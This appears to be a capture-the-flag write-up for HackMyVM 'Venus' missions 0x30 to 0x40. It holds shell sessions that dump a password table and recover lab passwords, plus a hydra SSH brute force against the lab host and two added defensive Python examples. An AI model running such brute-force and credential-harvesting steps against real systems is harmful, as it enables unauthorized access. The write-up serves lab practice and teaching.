lkjfdsoiu | dsaixpeqdW | | 89 | vcxnoj | dasdasixpeqdW | | 90 | ioyuwer | ixpeqdvcxvcxW | | 91 | kaka | ixpeqdW | | 92 | nini | ixpeqdvcxW | | 93 | zong | ixpeqdWfdsfsdf | | 94 | nana | ixpefdsafdsqdW | | 95 | ninna | ixpeqOPUIFDSFDSdW | +-----------+---------------+--------------------------------+ 95 rows in set (0.001 sec)
Found a flag, the one under the name haha => 8===xKmPDsJSKpHLzkqKXyjx===D~~
The others vary in length; filter for passwords that are 15 characters long, as most users' passwords are:
MariaDB [venus]> select * from people where length(pazz) = 15; +-----------+----------+-----------------+ | id_people | uzer | pazz | +-----------+----------+-----------------+ | 16 | sfdfdsml | ixpeqdsfsdfdsfW | | 44 | yuio | ixpgbvcbvcbeqdW | | 54 | crom | ixpefdbvvcbrqdW | | 58 | bael | ixpesdvsdvsdqdW | | 74 | nina | ixpeqdWuvC5N9kG | | 77 | dsar | ixpeF43F3F34qdW | | 78 | yop | ixpeqdWCSDFDSFD | | 79 | loco | ixpeF43F34F3qdW | +-----------+----------+-----------------+ 8 rows in set (0.005 sec)
Try brute-forcing:
sfdfdsml yuio crom bael nina dsar yop loco
ixpeqdsfsdfdsfW ixpgbvcbvcbeqdW ixpefdbvvcbrqdW ixpesdvsdvsdqdW ixpeqdWuvC5N9kG ixpeF43F3F34qdW ixpeqdWCSDFDSFD ixpeF43F34F3qdW
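But the brute force found nothing, and I don't know why. I checked whether these users exist, found that nina does, tried logging in, and it worked!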
30 nina
celeste@venus:~$ su -l nina
Password:
nina@venus:~$ ls -la
total 32
drwxr-x--- 2 root nina 4096 Apr 5 06:27 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 nina nina 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 nina nina 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 nina nina 807 Apr 23 2023 .profile
-rw-r----- 1 root nina 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root nina 197 Apr 5 06:27 mission.txt
nina@venus:~$ cat flagz.txt
8===VwICIymoA1DczWJau1sG===D~~
nina@venus:~$ cat mission.txt
################
# MISSION 0x30 #
################
## EN ##
The user kira is hidding something in http://localhost/method.php
## ES ##
La usuaria kira esconde algo en http://localhost/method.php
nina@venus:~$ curl -i -s http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:26:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
I dont like this method!
nina@venus:~$ curl -s -i -X POST http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:27:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
I dont like this method!
nina@venus:~$ curl -s -i -X HEAD http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:28:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
^C
nina@venus:~$ curl -s -i -X PUT http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:29:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
tPlqxSKuT4eP3yr
Trying further:
nina@venus:~$ curl -s -i -X DELETE http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:30:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
I dont like this method!
nina@venus:~$ curl -s -i -X CONNECT http://localhost/method.php
HTTP/1.1 405 Not Allowed
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:30:15 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
<html>
<head><title>405 Not Allowed</title></head>
<body>
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
nina@venus:~$ curl -s -i -X OPTIONS http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
I dont like this method!
nina@venus:~$ curl -s -i -X TRACE http://localhost/method.php
HTTP/1.1 405 Not Allowed
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:30:44 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
<html>
<head><title>405 Not Allowed</title></head>
<body>
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
nina@venus:~$ curl -s -i -X PATCH http://localhost/method.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:31:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
8===tPGClekAvQKSYthnLiwz===D~~I dont like this method!
Haha, nice!!!! Praise me!!!
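In the sessions above only the request verb separates the refusal text from the secret, and every verb the PHP script sees answers 200. The following is an added example, not code from the challenge: method.php's source is not on the page, so LeakyHandler is an assumed reconstruction of the observed responses, SECRET is a placeholder, and StrictHandler, audit and findings are hypothetical names for a regression check you can run against a handler of your own.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

REFUSAL = b"I dont like this method!"   # body returned in the session above
SECRET = b"CONSTRUCTED-SECRET"          # placeholder, not a value from the page
METHODS = ("GET", "POST", "PUT", "DELETE", "OPTIONS", "PATCH")


class _Base(BaseHTTPRequestHandler):
    def reply(self, status, body, headers=()):
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # silence per-request logging
        pass


class LeakyHandler(_Base):
    """Assumed reconstruction: every verb gets 200 and two verbs add the secret."""

    def any_verb(self):
        if self.command == "PUT":
            self.reply(200, SECRET)
        elif self.command == "PATCH":
            self.reply(200, SECRET + REFUSAL)
        else:
            self.reply(200, REFUSAL)

    do_GET = do_POST = do_PUT = do_DELETE = do_OPTIONS = do_PATCH = any_verb


class StrictHandler(_Base):
    """Hardened form: verbs outside the allow-list get 405 plus an Allow header."""
    ALLOWED = ("GET",)

    def any_verb(self):
        if self.command in self.ALLOWED:
            self.reply(200, b"ok")
        else:
            self.reply(405, b"", [("Allow", ", ".join(self.ALLOWED))])

    do_GET = do_POST = do_PUT = do_DELETE = do_OPTIONS = do_PATCH = any_verb


def audit(handler_cls, path="/method.php"):
    """Send each verb to a throwaway loopback server; return {verb: (status, body)}."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    results = {}
    try:
        for verb in METHODS:
            conn = http.client.HTTPConnection(
                "127.0.0.1", server.server_address[1], timeout=5)
            conn.request(verb, path)
            response = conn.getresponse()
            results[verb] = (response.status, response.read())
            conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return results


def findings(results):
    """Verbs that succeed with a body different from the GET baseline."""
    baseline = results["GET"]
    return sorted(v for v, r in results.items() if r[0] == 200 and r != baseline)


if __name__ == "__main__":
    print("leaky :", findings(audit(LeakyHandler)))
    print("strict:", findings(audit(StrictHandler)))
```

An empty findings list means no verb other than the baseline returns a distinct 200 body, which is the property the strict handler enforces.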
31 kira
nina@venus:~$ su -l kira
Password:
kira@venus:~$ ls -la
total 32
drwxr-x--- 2 root kira 4096 Apr 5 06:27 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 kira kira 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 kira kira 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 kira kira 807 Apr 23 2023 .profile
-rw-r----- 1 root kira 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root kira 191 Apr 5 06:27 mission.txt
kira@venus:~$ cat flagz.txt
8===rJun2WyeuGIvabWQvJko===D~~
kira@venus:~$ cat mission.txt
################
# MISSION 31 #
################
## EN ##
The user veronica visits a lot http://localhost/waiting.php
## ES ##
La usuaria veronica visita mucho http://localhost/waiting.php
kira@venus:~$ curl -s -i http://localhost/waiting.php
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:41:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Im waiting for the user-agent PARADISE.
kira@venus:~$ curl -s -i http://localhost/waiting.php -A "PARADISE"
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 30 Jun 2024 18:41:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
QTOel6BodTx2cwX
32 veronica
kira@venus:~$ su -l veronica
Password:
veronica@venus:~$ ls -la
total 32
drwxr-x--- 2 root veronica 4096 Apr 5 06:27 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 veronica veronica 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 veronica veronica 3559 Apr 5 06:28 .bashrc
-rw-r--r-- 1 veronica veronica 807 Apr 23 2023 .profile
-rw-r----- 1 root veronica 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root veronica 228 Apr 5 06:27 mission.txt
veronica@venus:~$ cat flagz.txt
8===iSSeKzoDXsKy8WPuqNPg===D~~
veronica@venus:~$ cat mission.txt
################
# MISSION 0x32 #
################
## EN ##
The user veronica uses a lot the password from lana, so she created an alias.
## ES ##
La usuaria veronica usa mucho la password de lana, asi que ha creado un alias.
veronica@venus:~$ alias
alias lanapass='UWbc0zNEVVops1v'
alias ls='ls --color=auto'
33 lana
veronica@venus:~$ su -l lana Password: lana@venus:~$ ls -la total 44 drwxr-x--- 2 root lana 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 lana lana 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 lana lana 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 lana lana 807 Apr 23 2023 .profile -rw-r----- 1 root lana 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root lana 161 Apr 5 06:27 mission.txt -rw-r----- 1 root lana 10240 Apr 5 06:28 zip.gz lana@venus:~$ cat flagz.txt 8===um3Hno2AsjFjuLWsfmDj===D~~ lana@venus:~$ cat mission.txt ################ # MISSION 0x33 # ################ ## EN ## The user noa loves to compress her things. ## ES ## A la usuaria noa le gusta comprimir sus cosas. lana@venus:~$ gunzip -h Usage: gzip [OPTION]... [FILE]... Compress or uncompress FILEs (by default, compress FILES in-place). Mandatory arguments to long options are mandatory for short options too. -c, --stdout write on standard output, keep original files unchanged -d, --decompress decompress -f, --force force overwrite of output file and compress links -h, --help give this help -k, --keep keep (don't delete) input files -l, --list list compressed file contents -L, --license display software license -n, --no-name do not save or restore the original name and timestamp -N, --name save or restore the original name and timestamp -q, --quiet suppress all warnings -r, --recursive operate recursively on directories --rsyncable make rsync-friendly archive -S, --suffix=SUF use suffix SUF on compressed files --synchronous synchronous output (safer if system crashes, but slower) -t, --test test compressed file integrity -v, --verbose verbose mode -V, --version display version number -1, --fast compress faster -9, --best compress better With no FILE, or when FILE is -, read standard input. Report bugs to <bug-gzip@gnu.org>. 
lana@venus:~$ gunzip -d zip.gz
gzip: zip.gz: not in gzip format
lana@venus:~$ file zip.gz
zip.gz: POSIX tar archive (GNU)
lana@venus:~$ cat zip.gz
pwned/lana/zip0000644000000000000000000000002014603715036012326 0ustar rootroot9WWOPoeJrq6ncvJ
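The session above has the extension misleading gunzip while file identifies the content from its magic bytes, and the member is then read by dumping the raw archive. As an added example (not part of the original writeup), the same triage done in Python: it names the container from its signature, unwraps a gzip layer under a size cap, and reads tar members in memory. The function names and the payload are constructed for illustration; the member path is the one visible in the cat output, and the ISO 9660 signature is included because the same check applies to the music.iso file in mission 0x37.

```python
import io
import tarfile
import zlib

# (offset, magic, label): offsets and magics come from the format specifications
SIGNATURES = [
    (0, b"\x1f\x8b", "gzip"),
    (0, b"PK\x03\x04", "zip"),
    (257, b"ustar", "tar"),          # POSIX and GNU tar both start the field with "ustar"
    (0x8001, b"CD001", "iso9660"),   # primary volume descriptor, sector 16
]
EXTENSIONS = {".gz": "gzip", ".zip": "zip", ".tar": "tar", ".iso": "iso9660"}
MAX_BYTES = 1 << 20                  # cap on decompressed data and on each member


def sniff(data: bytes) -> str:
    """Name the container format from its magic bytes, ignoring the file name."""
    for offset, magic, label in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return label
    return "unknown"


def read_tar_members(data: bytes) -> dict:
    """Return {member name: content} for regular files, read in memory only."""
    members = {}
    # mode "r:" accepts an uncompressed tar only, so a wrong guess fails loudly
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        for info in tar:
            if info.isfile() and info.size <= MAX_BYTES:
                members[info.name] = tar.extractfile(info).read()
    return members


def triage(name: str, data: bytes) -> dict:
    """Compare what the name claims with what the bytes are, then unwrap."""
    claimed = next((t for ext, t in EXTENSIONS.items() if name.endswith(ext)), "unknown")
    layers = [sniff(data)]
    if layers[0] == "gzip":
        # wbits=31 selects the gzip wrapper; max_length bounds the output size
        data = zlib.decompressobj(wbits=31).decompress(data, MAX_BYTES)
        layers.append(sniff(data))
    members = read_tar_members(data) if layers[-1] == "tar" else {}
    return {"claimed": claimed, "layers": layers,
            "mismatch": claimed != layers[0], "members": members}


def make_sample() -> bytes:
    """Constructed input: a plain tar holding one small file, like zip.gz above."""
    payload = b"constructed-secret\n"
    info = tarfile.TarInfo("pwned/lana/zip")
    info.size = len(payload)
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    report = triage("zip.gz", make_sample())
    print(report["claimed"], report["layers"], report["mismatch"])
    for member, content in report["members"].items():
        print(member, content)
```

Reading members through tarfile instead of cat keeps the header fields (mode, size, owner) out of the recovered content.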
34 noa
lana@venus:~$ su -l noa Password: noa@venus:~$ ls -la total 36 drwxr-x--- 2 root noa 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 noa noa 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 noa noa 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 noa noa 807 Apr 23 2023 .profile -rw-r----- 1 root noa 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root noa 159 Apr 5 06:27 mission.txt -rw-r----- 1 root noa 3818 Apr 5 06:28 trash noa@venus:~$ cat flagz.txt 8===HUNGevKdeKwcCvJru1CC===D~~ noa@venus:~$ cat mission.txt ################ # MISSION 0x34 # ################ ## EN ## The password of maia is surrounded by trash ## ES ## La password de maia esta rodeada de basura venus:~$ file trash trash: data noa@venus:~$ strings trash b;pK *&dv |.- wsG9 D55- \|gu 1q#^ YV!)} f}nP T735 5GOj' g3-5v)S~hK {Xu7 O;rTl, ]Bokc 04`0 X:Uf ;Vtr3 `vr) k` I <(;pQ @$LiJ u7TI *Q{r% ;%gzDB b%/* 3g?d =I+" xfFN \nh1hnDPHpydEjoEN ! 2L~8 JmN8 @%`j , ^, e&xvN2 _cKn .c|0 )|hd& hl(p fEr: OdBb ?OsP dnN9 J7e( JL6( wI;%vz apPD a5qi |otr 4TTm toyi *f|F .%J`t noa@venus:~$ strings trash | grep -E '^.{15,}$' \nh1hnDPHpydEjoEN
- -E: regular-expression mode
- ^: start of the line
- .: any character
- {15,}: at least 15 repetitions
- $: end of the line
35 maia
noa@venus:~$ su -l maia Password: maia@venus:~$ ls -la total 36 drwxr-x--- 2 root maia 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 maia maia 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 maia maia 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 maia maia 807 Apr 23 2023 .profile -rw-r----- 1 root maia 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root maia 16 Apr 5 06:28 forget -rw-r----- 1 root maia 317 Apr 5 06:27 mission.txt maia@venus:~$ cat flagz.txt 8===nu8IDScKFAXVcnFutKtG===D~~ maia@venus:~$ cat mission.txt ################ # MISSION 0x35 # ################ ## EN ## The user gloria has forgotten the last 2 characters of her password ... They only remember that they were 2 lowercase letters. ## ES ## La usuaria gloria ha olvidado los 2 ultimos caracteres de su password... Solo recuerdan que eran 2 letras minusculas. maia@venus:~$ cat forget v7xUVE2e5bjUc?? hgbe02@pwn:~/temp$ for a in {a..z}; do for b in {a..z}; do echo "v7xUVE2e5bjUc$a$b" >> pass; done; done hgbe02@pwn:~/temp$ head -n 20 pass v7xUVE2e5bjUcaa v7xUVE2e5bjUcab v7xUVE2e5bjUcac v7xUVE2e5bjUcad v7xUVE2e5bjUcae v7xUVE2e5bjUcaf v7xUVE2e5bjUcag v7xUVE2e5bjUcah v7xUVE2e5bjUcai v7xUVE2e5bjUcaj v7xUVE2e5bjUcak v7xUVE2e5bjUcal v7xUVE2e5bjUcam v7xUVE2e5bjUcan v7xUVE2e5bjUcao v7xUVE2e5bjUcap v7xUVE2e5bjUcaq v7xUVE2e5bjUcar v7xUVE2e5bjUcas v7xUVE2e5bjUcat hgbe02@pwn:~/temp$ hydra -l gloria -P pass ssh://venus.hackmyvm.eu:5000 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 03:14:16 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 676 login tries (l:1/p:676), ~43 tries per task [DATA] attacking ssh://venus.hackmyvm.eu:5000/ [STATUS] 98.00 tries/min, 98 tries in 00:01h, 579 to do in 00:06h, 16 active [STATUS] 103.33 tries/min, 310 tries in 00:03h, 367 to do in 00:04h, 16 active [5000][ssh] host: venus.hackmyvm.eu login: gloria password: v7xUVE2e5bjUcxw [STATUS] 96.57 tries/min, 676 tries in 00:07h, 1 to do in 00:01h, 2 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 03:21:19
36 gloria
maia@venus:~$ su -l gloria Password: gloria@venus:~$ ls -la total 36 drwxr-x--- 2 root gloria 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 gloria gloria 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 gloria gloria 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 gloria gloria 807 Apr 23 2023 .profile -rw-r----- 1 root gloria 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root gloria 1713 Apr 5 06:28 image -rw-r----- 1 root gloria 222 Apr 5 06:27 mission.txt gloria@venus:~$ cat flagz.txt 8===RZIkEtaEp18tLslTopJj===D~~ gloria@venus:~$ cat mission.txt ################ # MISSION 0x36 # ################ ## EN ## User alora likes drawings, that's why she saved her password as ... ## ES ## A la usuaria alora le gustan los dibujos, por eso ha guardado su password como... gloria@venus:~$ file image image: ASCII text gloria@venus:~$ cat image ########################################################## ########################################################## ########################################################## ########################################################## ######## ########## ## ######## ######## ########## ## ## #### ########## ######## ######## ## ## ## ## ###### ## ## ######## ######## ## ## #### ######## ## ## ######## ######## ## ## ## #### ## ## ######## ######## ########## ## #### ########## ######## ######## ## ## ## ## ######## ######################## #### ########################## ######## ## #### #### ## ## ## ########## ############ ###### ## ## ## ######## ######## ## ## ## ## #### ## ######## ############## ## ## ###### ## #### ######## ############ ## ## ######## ## ## ########## ######################## #### ## ## #### ######## ######## ## #### ## ########## ######## ########## ###### ########## #### ########## ######## ## ## #### ## ###### ######## ######## ## ## ## ## ###### ## #### ######## ######## ## ## #### ## ## ## ######## ######## ########## ## #### ## ################## ######## ## ## ########## 
########################################################## ########################################################## ########################################################## ##########################################################
Scanning it with WeChat gives the password: mhrTFCoxGoqUxtw
37 alora
gloria@venus:~$ su -l alora Password: alora@venus:~$ ls -la total 384 drwxr-x--- 2 root alora 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 alora alora 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 alora alora 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 alora alora 807 Apr 23 2023 .profile -rw-r----- 1 root alora 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root alora 176 Apr 5 06:27 mission.txt -rw-r----- 1 root alora 360448 Apr 5 06:28 music.iso alora@venus:~$ cat flagz.txt 8===NSe78N2lM7IbvHzvrC0G===D~~ alora@venus:~$ cat mission.txt ################ # MISSION 0x37 # ################ ## EN ## The user julie has created an iso with her password. ## ES ## La usuaria julie ha creado una iso con su password. alora@venus:~$ file music.iso music.iso: ISO 9660 CD-ROM filesystem data 'CDROM' alora@venus:~$ strings music.iso CD001 LINUX CDROM GENISOIMAGE ISO 9660/HFS FILESYSTEM CREATOR (C) 1993 E.YOUNGDALE (C) 1997-2006 J.PEARSON/J.SCHILLING (C) 2006-2007 CDRKIT TEAM 2024040506284600 2024040506284600 0000000000000000 2024040506284600 CD001 MUSIC.ZIP;1RR music.zipPX$ RRIP_1991ATHE ROCK RIDGE INTERCHANGE PROTOCOL PROVIDES SUPPORT FOR POSIX FILE SYSTEM SEMANTICSPLEASE CONTACT DISC PUBLISHER FOR SPECIFICATION SOURCE. SEE PUBLISHER IDENTIFIER IN PRIMARY VOLUME DESCRIPTOR FOR CONTACT INFORMATION. pwned/alora/music.txtUT sjDf4i2MSNgSvOv pwned/alora/music.txtUT
That gives the password. Let's also try the conventional approach of mounting it:
alora@venus:~$ mkdir /tmp/temp_music
alora@venus:~$ mount -o loop music.iso /tmp/temp_music
mount: /tmp/temp_music: mount failed: Operation not permitted.
alora@venus:~$ sudo mount -o loop music.iso /tmp/temp_music
[sudo] password for alora:
alora is not in the sudoers file. This incident has been reported to the administrator.
# Transferred to the local machine
hgbe02@pwn:~/temp$ mkdir /tmp/music
hgbe02@pwn:~/temp$ sudo mount -o loop music.iso /tmp/music
[sudo] password for hgbe02:
mount: /tmp/music: WARNING: source write-protected, mounted read-only.
hgbe02@pwn:~/temp$ unzip /tmp/music/music.zip -d tmp
Archive: /tmp/music/music.zip
extracting: tmp/pwned/alora/music.txt
hgbe02@pwn:~/temp$ cat /tmp/pwned/a;ora/music.txt
cat: /tmp/pwned/a: No such file or directory
-bash: ora/music.txt: No such file or directory
hgbe02@pwn:~/temp$ cat tmp/pwned/alora/music.txt
sjDf4i2MSNgSvOv
hgbe02@pwn:~/temp$ sudo umount /tmp/music
To download it to the local machine, I used termius and then transferred it over SFTP.
38 julie
alora@venus:~$ su -l julie
Password:
julie@venus:~$ ls -la
total 48
drwxr-x--- 2 root julie 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 julie julie 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 julie julie 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 julie julie 807 Apr 23 2023 .profile
-rw-r----- 1 root julie 4802 Apr 5 06:28 1.txt
-rw-r----- 1 root julie 4802 Apr 5 06:28 2.txt
-rw-r----- 1 root julie 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root julie 192 Apr 5 06:27 mission.txt
julie@venus:~$ cat flagz.txt
8===Iwe1QpxTcx0A8Uusqjfe===D~~
julie@venus:~$ cat mission.txt
################
# MISSION 0x38 #
################
## EN ##
The user irene believes that the beauty is in the difference.
## ES ##
La usuaria irene cree que en la diferencia esta lo bonito.
julie@venus:~$ diff 1.txt 2.txt
174c174
< 8VeRLEFkBpe2DSD
---
> aNHRdohjOiNizlU
Either of the two could be it; try each to see whether switching users works.
39 irene
julie@venus:~$ su -l irene
Password:
irene@venus:~$ ls -la
total 44
drwxr-x--- 2 root irene 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 irene irene 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 irene irene 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 irene irene 807 Apr 23 2023 .profile
-rw-r----- 1 root irene 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root irene 1704 Apr 5 06:28 id_rsa.pem
-rw-r----- 1 root irene 451 Apr 5 06:28 id_rsa.pub
-rw-r----- 1 root irene 178 Apr 5 06:27 mission.txt
-rw-r----- 1 root irene 256 Apr 5 06:28 pass.enc
irene@venus:~$ cat flagz.txt
8===c9hgLkLGzsNw7mB3VEr4===D~~
irene@venus:~$ cat mission.txt
################
# MISSION 0x39 #
################
## EN ##
The user adela has lent her password to irene.
## ES ##
La usuaria adela le ha dejado prestada su password a irene.
irene@venus:~$ openssl pkeyutl -decrypt -inkey id_rsa.pem -in pass.enc
nbhlQyKuaXGojHx
40 adela
irene@venus:~$ su -l adela
Password:
adela@venus:~$ ls -la
total 36
drwxr-x--- 2 root adela 4096 Apr 5 06:28 .
drwxr-xr-x 1 root root 4096 Apr 5 06:27 ..
-rw-r--r-- 1 adela adela 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 adela adela 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 adela adela 807 Apr 23 2023 .profile
-rw-r----- 1 root adela 31 Apr 5 06:27 flagz.txt
-rw-r----- 1 root adela 213 Apr 5 06:27 mission.txt
-rw-r----- 1 root adela 44 Apr 5 06:28 wtf
adela@venus:~$ cat flagz.txt
8===86XGXQefUeV2eEdrUzxx===D~~
adela@venus:~$ cat mission.txt
################
# MISSION 0x40 #
################
## EN ##
User sky has saved her password to something that can be listened to.
## ES ##
La usuaria sky ha guardado su password en algo que puede ser escuchado.
adela@venus:~$ cat wtf
.--. .- .--. .- .--. .- .-. .- -.. .. ... .
Decode it with cyberchef; it is Morse code: PAPAPARADISE, which in lowercase is papaparadise